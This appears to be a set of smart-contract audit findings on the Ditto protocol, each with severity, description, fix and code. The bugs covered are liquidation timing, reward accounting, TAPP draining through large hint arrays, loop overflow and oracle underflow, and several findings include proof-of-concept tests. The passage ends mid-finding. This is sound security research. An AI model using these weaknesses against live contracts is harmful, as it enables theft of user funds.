Shorts flagged for liquidation can not be liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. 
Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.
Consider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.
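\\nA minimal sketch of that change, applied to the `_canLiquidate` excerpt shown above:\\n```\\n-    if (timeDiff >= resetLiquidationTime) {\\n+    if (timeDiff > resetLiquidationTime) {\\n         return false;\\n     } else {\\n```\\nWith this, `timeDiff == resetLiquidationTime` falls into the `isBetweenSecondAndResetLiquidationTime` window, matching the `timeDiff <= resetLiquidationTime` bound used by `flagShort`.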
null
```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n
Changes in `dittoShorterRate` apply retroactively to accrued Ditto yield shares
low
The calculation of the Ditto rewards earned by shorters does not take into account that changes in the Ditto shorter rate apply retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and, in line 138, calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nLooking at line 135, `dittoRewardShortersTotal` is the product of the Ditto shorter rate and the total time elapsed since protocol deployment.\\nThis calculation is wrong, as it assumes that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. This means that changes in the Ditto shorter rate apply retroactively, inflating or deflating the new Ditto rewards of the users.
Also, users that have yielded the same number of shares during the same period will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n    function testYieldRateChange() public {\\n        address alice = makeAddr("alice");\\n        address bob = makeAddr("bob");\\n        address[] memory assets = new address[](1);\\n        assets[0] = asset;\\n\\n        fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n        fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n        fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n        generateYield();\\n        skip(yieldEligibleTime);\\n\\n        // Alice and Bob have the same number of Ditto yield shares\\n        assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, bob));\\n\\n        // Alice's yield is distributed\\n        vm.prank(alice);\\n        diamond.distributeYield(assets);\\n\\n        // Ditto shorter rate is updated\\n        vm.prank(owner);\\n        diamond.setDittoShorterRate(vault, 2);\\n\\n        // Bob's yield is distributed\\n        vm.prank(bob);\\n        diamond.distributeYield(assets);\\n\\n        uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n        uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n        // Bob receives more Ditto rewards than Alice, even though both were entitled to the same amount\\n        assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n    }\\n```\\n
Create two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\n
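For the snapshot to stay consistent, these two variables also have to be refreshed whenever the rate changes. A rough sketch of that update, assuming the new fields live in the vault struct and reusing the existing `setDittoShorterRate` setter (field names and the access modifier are illustrative):\\n```\\nfunction setDittoShorterRate(uint256 vault, uint16 rewardRate) external onlyAdminOrDAO {\\n    STypes.Vault storage Vault = s.vault[vault];\\n    uint256 protocolTime = LibOrders.getOffsetTime();\\n    // accrue the rewards earned under the old rate before switching\\n    Vault.lastSnapshotRewards +=\\n        Vault.dittoShorterRate * (protocolTime - Vault.lastSnapshotTimestamp);\\n    Vault.lastSnapshotTimestamp = protocolTime;\\n    Vault.dittoShorterRate = rewardRate;\\n}\\n```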
Changes in the Ditto shorter rate apply retroactively, inflating or deflating the new Ditto rewards of users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.
```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n
Margin callers can drain the TAPP during liquidation by willingly increasing gas costs via the shortHintArray
high
During primary liquidation, the TAPP (Treasury Asset Protection Pool) pays the gas costs of forced bids, so that margin callers remain motivated to liquidate shorters even when gas costs are high. To liquidate a shortRecord, margin callers must provide a parameter called shortHintArray to the function call. The purpose of this array is to save gas: it should contain id hints telling the protocol where to look for shorts in the order book that are currently above the oracle price, since users can't match against shorts under the oracle price. Because the protocol loops through this shortHintArray and the length of the array is never checked, an array with wrong hints increases gas consumption and could even drive the gas costs to an amount that fully drains the TAPP. As the TAPP is an important security mechanism of the protocol, draining its funds could lead to a shutdown of the market and therefore to a large loss of user funds.\\nThe liquidate function takes the shortHintArray as a parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forced bid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nDuring this process, the protocol loops over the array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a large shortHintArray with wrong hints, the gas costs will increase drastically, to the point of draining the TAPP's funds.
Check the length of the shortHintArray.
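\\nA rough sketch of such a bound at the top of `liquidate` (the constant, its value, and the error name are illustrative):\\n```\\nuint256 constant MAX_SHORT_HINTS = 10; // illustrative upper bound\\n\\n// inside liquidate(), before the forced bid is created\\nif (shortHintArray.length > MAX_SHORT_HINTS) {\\n    revert Errors.TooManyShortHints(); // hypothetical error\\n}\\n```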
If the TAPP no longer has enough funds to pay for liquidations of under-collateralized shortRecords, serious problems such as an increase of the ercDebtRate and a shutdown of the market can occur. This leads to a large loss of user funds.
```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n
The protocol allows fewer flags to be generated than intended, which could lead to a DoS of the primary liquidation process
low
The maximum number of flags (for liquidation) that can exist at the same time should be limited by the maximum value of `flaggerIdCounter`, which is a uint24, but it is limited by the maximum value of a uint16 instead. Therefore, at most 65535 shortRecords can be flagged for liquidation at the same time. This is far too few if the protocol is used heavily and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter, and therefore the maximum number of flags that can exist at the same time, is limited by the maximum value of a uint24:\\n```\\nuint24 flaggerIdCounter;\\n```\\n\\nIf there are no flags left to override, the system tries to generate a new flagId, but it does not use the maximum value of uint24; it uses the maximum value of uint16 instead, which is 65535:\\n```\\n} else if (s.flaggerIdCounter < type(uint16).max) {\\n //@dev generate brand new flaggerId\\n short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n s.flaggerIdCounter++;\\n} else {\\n revert Errors.InvalidFlaggerHint();\\n}\\n```\\n\\nThis can be far too few if the protocol is used heavily and the price of a market goes up. It would then prevent creating new flaggerIds, so shortRecords with an unhealthy CR could not be flagged and liquidated.
Set the check to type(uint24).max.
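\\nA minimal sketch of the change, assuming the flagger id fields are wide enough to hold uint24 values:\\n```\\n-} else if (s.flaggerIdCounter < type(uint16).max) {\\n+} else if (s.flaggerIdCounter < type(uint24).max) {\\n     //@dev generate brand new flaggerId\\n     short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n     s.flaggerIdCounter++;\\n } else {\\n     revert Errors.InvalidFlaggerHint();\\n }\\n```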
DoS of the liquidation process, potentially leaving many shortRecords with an unhealthy CR. In the worst case, assets would no longer be sufficiently backed and the market would need to be shut down, resulting in a large loss of user funds.
```\\nuint24 flaggerIdCounter;\\n```\\n
Infinite loop breaks protocol functionality.
low
Protocol documentation says that the DAO is able to cancel up to 1,000 orders when the order count is above 65,000. However, because of a faulty `for loop`, it is impossible to cancel more than 255 orders.\\nVulnerability details\\n`orderId` is used in the protocol to index orders in the orderbook. The protocol documentation states that it can handle more than 65,000 orders because of reusable orderIds. When there are more than 65,000 orders, the DAO can cancel up to 1,000 orders. Here are the code blocks from the `cancelOrderFarFromOracle` function, which allows the DAO to cancel orders (it also allows a user to cancel one order).\\nIt makes sure that there are more than 65,000 orders:\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that the DAO can't cancel more than 1,000 orders:\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\n`cancelOrderFarFromOracle` then checks whether `msg.sender == LibDiamond.diamondStorage().contractOwner` and, based on the boolean value of this statement, allows cancelling the desired number of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol), which is called on the mapping of orders of the previously specified `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nThis function receives the following parameters:\\nmapping of orders to cancel\\naddress of the asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nLooking at the implementation, `uint8` is used for the iteration variable of the `for loop`. The maximum value of a `uint8` is `255`, and the `unchecked` block in the loop allows uint underflow/overflow:\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nNormally, when adding 1 to 255 (255 + 1), Solidity would automatically `revert` due to uint overflow, but inside `unchecked` the operation is allowed and the result is `0`.\\nWhen the DAO tries to cancel more than 255 orders, an infinite loop results, since:\\nthe for loop iterates while `i` < numOrdersToCancel\\nthe value of `i` can never exceed 255, because it wraps around to 0 on overflow\\nso with numOrdersToCancel >= 256 the condition is always true: `i = 255`, `unchecked {++i;}`, next iteration `i = 0`, `unchecked {++i;}`, and so on\\nI created a simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 order cancellations, run it with the input parameter (amountOfIterations) equal to 256 or above.\\nFurther explanation\\nAfter the DAO tries to cancel more than 255 orders, an infinite loop is created and the transaction cannot complete.\\nThe transaction will fail because of gas consumption.
The for loop will run for as many iterations as the provided gas allows. Since it tries to run forever, it inevitably runs out of gas.
To solve this problem, change `uint8 i` to `uint16` or any larger uint type that can handle the desired number of iterations.
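\\nThe loop from above with the counter widened to match `numOrdersToCancel`:\\n```\\nfunction cancelManyOrders(\\n    mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n    address asset,\\n    uint16 lastOrderId,\\n    uint16 numOrdersToCancel\\n) internal {\\n    uint16 prevId;\\n    uint16 currentId = lastOrderId;\\n    // uint16 matches the type of numOrdersToCancel, so i can always reach it\\n    for (uint16 i; i < numOrdersToCancel;) {\\n        prevId = orders[asset][currentId].prevId;\\n        LibOrders.cancelOrder(orders, asset, currentId);\\n        currentId = prevId;\\n        unchecked {\\n            ++i;\\n        }\\n    }\\n}\\n```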
Protocol documentation states that the DAO is able to cancel 1,000 orders. Since this is not possible with the current implementation, the issue disrupts the protocol's functionality: the code cannot deliver the documented behavior.\\nTools used\\nVSCode, Manual Review, Remix
```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n
Order creation can run out of gas due to reliance on the previous order's match type
medium
If the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.
I think the probability of the above scenario is higher than that of multiple users cancelling their orders. Hence, moving on to the next hint order as soon as the current hint order is found to have been reused could be better and will cost less gas in the error case.
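\\nOne possible shape of that change in `findOrderHintId` (a sketch; whether to keep the event and what to do once all hints are exhausted are design choices):\\n```\\n         } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n-            //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n-            emit Events.FindOrderHintId(2);\\n-            return Constants.HEAD;\\n+            //@dev hint id was reused; try the next hint instead of falling back to HEAD\\n+            emit Events.FindOrderHintId(2);\\n+            continue;\\n         }\\n```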
Order creation can run out of gas in a particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run the test:\\n```\\ndiff --git a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n--- a/test/AskSellOrders.t.sol\\n+++ b/test/AskSellOrders.t.sol\\n@@ -8,7 +8,7 @@ import {Errors} from "contracts/libraries/Errors.sol";\\n import {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\n \\n import {OBFixture} from "test/utils/OBFixture.sol";\\n-// import {console} from "contracts/libraries/console.sol";\\n+import {console} from "contracts/libraries/console.sol";\\n \\n contract SellOrdersTest is OBFixture {\\n     using U256 for uint256;\\n@@ -59,6 +59,49 @@ contract SellOrdersTest is OBFixture {\\n         assertEq(asks[0].price, DEFAULT_PRICE);\\n     }\\n \\n+    function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n+        for (uint256 i = 0; i < 1000; i++) {\\n+            fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n+        }\\n+\\n+        // a new order at the bottom of the order book\\n+        fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n+        assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n+        assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n+\\n+        // user wants to create an order at HIGHER_PRICE\\n+        MTypes.OrderHint[] memory orderHintArray =\\n+            diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n+        uint16 targetOrderId = orderHintArray[0].hintId;\\n+        assertTrue(targetOrderId == getAsks()[1000].id);\\n+\\n+        // the target order gets cancelled\\n+        vm.prank(sender);\\n+        cancelAsk(targetOrderId);\\n+\\n+        // a person creates a limit ask which reuses the cancelled order id\\n+        fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n+        assertTrue(getAsks()[0].id == targetOrderId);\\n+\\n+        // a bid matches the targetId\\n+        fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n+\\n+        // another person creates a limit ask which reuses the matched order id\\n+        fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n+        assertTrue(getAsks()[0].id == targetOrderId);\\n+\\n+        // the tx of the user goes through\\n+        depositUsd(sender, DEFAULT_AMOUNT);\\n+        vm.prank(sender);\\n+        uint256 gasStart = gasleft();\\n+        diamond.createAsk(\\n+            asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n+        );\\n+        uint256 gasUsed = gasStart - gasleft();\\n+        assertGt(gasUsed, 2_000_000);\\n+        console.log(gasUsed);\\n+    }\\n+\\n     function testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n         fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n         fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\n
```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n
Secondary short liquidation reverts due to arithmetic underflow in volatile market conditions
medium
The `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. 
